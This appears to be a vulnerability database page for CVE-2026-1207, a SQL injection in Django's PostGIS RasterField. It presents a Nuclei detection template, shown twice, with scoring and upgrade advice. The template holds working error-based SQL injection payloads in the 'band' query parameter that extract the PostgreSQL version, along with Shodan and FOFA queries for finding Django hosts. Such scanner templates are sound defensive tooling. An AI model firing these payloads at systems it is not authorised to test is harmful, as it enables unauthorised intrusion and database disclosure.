Django RasterField - SQL Injection

CVE-2026-1207

Verified

Description

Django < 6.0.2, < 5.2.11, and < 4.2.28 contains a SQL injection caused by improper sanitization of the band index parameter in RasterField on PostGIS, letting remote attackers inject SQL, exploit requires crafted input.

Severity

High

CVSS Score

8.1

Exploit Probability

Affected Product

django

Published Date

February 5, 2026

Template Author

omarkurt

CVE-2026-1207.yaml

id: CVE-2026-1207

info:
  name: Django RasterField - SQL Injection
  author: omarkurt
  severity: high
  description: |
    Django < 6.0.2, < 5.2.11, and < 4.2.28 contains a SQL injection caused by improper sanitization of the band index parameter in RasterField on PostGIS, letting remote attackers inject SQL, exploit requires crafted input.
  impact: |
    Remote attackers can execute arbitrary SQL commands, potentially leading to data disclosure or modification.
  remediation: |
    Upgrade to versions 6.0.2, 5.2.11, 4.2.28 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1207
    - https://www.djangoproject.com/weblog/2026/feb/03/security-releases/
    - https://github.com/django/django/commit/81aa5292967cd09319c45fe2c1a525ce7b6684d8
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
    cvss-score: 8.1
    cve-id: CVE-2026-1207
    epss-score: 0.05295
    epss-percentile: 0.90113
    cwe-id: CWE-89
    cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: djangoproject
    product: django
    shodan-query: 'django'
    fofa-query: 'app="Django"'
  tags: cve,cve2026,django,sqli,postgis,rasterfield,vuln,unauth,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--"
      - "{{BaseURL}}/api/raster/search/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains_all(body, "invalid input syntax for type integer", "PostgreSQL")'
        condition: and

    extractors:
      - type: regex
        name: postgres_version
        part: body
        group: 1
        regex:
          - 'PostgreSQL ([0-9]+\.[0-9]+)'
# digest: 4a0a004730450220641afb2f278dd1a24e92827255644ece69367cb97160b5dac4f638a9d6a54aca022100f9c99bb1e153d4230130544ebeb8f9e38f6ba5ee8a801df7ff814efa7e791e7d:922c64590222798bb761d5b6d8e72950

8.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

CVE ID:

cve-2026-1207

CWE ID:

cwe-89

References

https://nvd.nist.gov/vuln/detail/CVE-2026-1207 https://www.djangoproject.com/weblog/2026/feb/03/security-releases/https://github.com/django/django/commit/81aa5292967cd09319c45fe2c1a525ce7b6684d8

Remediation Steps

Upgrade to versions 6.0.2, 5.2.11, 4.2.28 or later.

id: CVE-2026-1207

info:
  name: Django RasterField - SQL Injection
  author: omarkurt
  severity: high
  description: |
    Django < 6.0.2, < 5.2.11, and < 4.2.28 contains a SQL injection caused by improper sanitization of the band index parameter in RasterField on PostGIS, letting remote attackers inject SQL, exploit requires crafted input.
  impact: |
    Remote attackers can execute arbitrary SQL commands, potentially leading to data disclosure or modification.
  remediation: |
    Upgrade to versions 6.0.2, 5.2.11, 4.2.28 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1207
    - https://www.djangoproject.com/weblog/2026/feb/03/security-releases/
    - https://github.com/django/django/commit/81aa5292967cd09319c45fe2c1a525ce7b6684d8
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
    cvss-score: 8.1
    cve-id: CVE-2026-1207
    epss-score: 0.05295
    epss-percentile: 0.90113
    cwe-id: CWE-89
    cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: djangoproject
    product: django
    shodan-query: 'django'
    fofa-query: 'app="Django"'
  tags: cve,cve2026,django,sqli,postgis,rasterfield,vuln,unauth,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--"
      - "{{BaseURL}}/api/raster/search/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains_all(body, "invalid input syntax for type integer", "PostgreSQL")'
        condition: and

    extractors:
      - type: regex
        name: postgres_version
        part: body
        group: 1
        regex:
          - 'PostgreSQL ([0-9]+\.[0-9]+)'
# digest: 4a0a004730450220641afb2f278dd1a24e92827255644ece69367cb97160b5dac4f638a9d6a54aca022100f9c99bb1e153d4230130544ebeb8f9e38f6ba5ee8a801df7ff814efa7e791e7d:922c64590222798bb761d5b6d8e72950

Django RasterField - SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Django RasterField - SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps